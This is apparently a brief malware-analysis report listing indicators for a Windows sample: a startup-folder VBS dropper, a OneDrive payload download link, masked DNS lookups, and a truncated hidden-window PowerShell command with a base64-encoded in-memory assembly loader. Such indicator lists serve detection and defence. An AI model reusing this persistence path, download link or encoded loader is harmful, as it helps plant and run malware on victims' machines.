Technical information
- %APPDATA%\microsoft\windows\start menu\programs\startup\system.vbs
- https://onedrive.live.com/download?cid=e41ff803ccc78e6a&resid=e41ff803ccc78e6a%21106&authkey=amy-nmqaneyi4hw
- 'on####ve.live.com':443
- 'qk####.#y.files.1drv.com':443
- DNS ASK on####ve.live.com
- DNS ASK qk####.#y.files.1drv.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -noexit -en WwBBAHAAcABEAG8AbQBhAGkAbgBdADoAOgBDAHUAcgByAGUAbgB0AEQAbwBtAGEAaQBuAC4ATABvAGEAZAAoAFsAQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAGIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAKABOAGUAdwAtAE8AYgBqA...' (with a hidden window)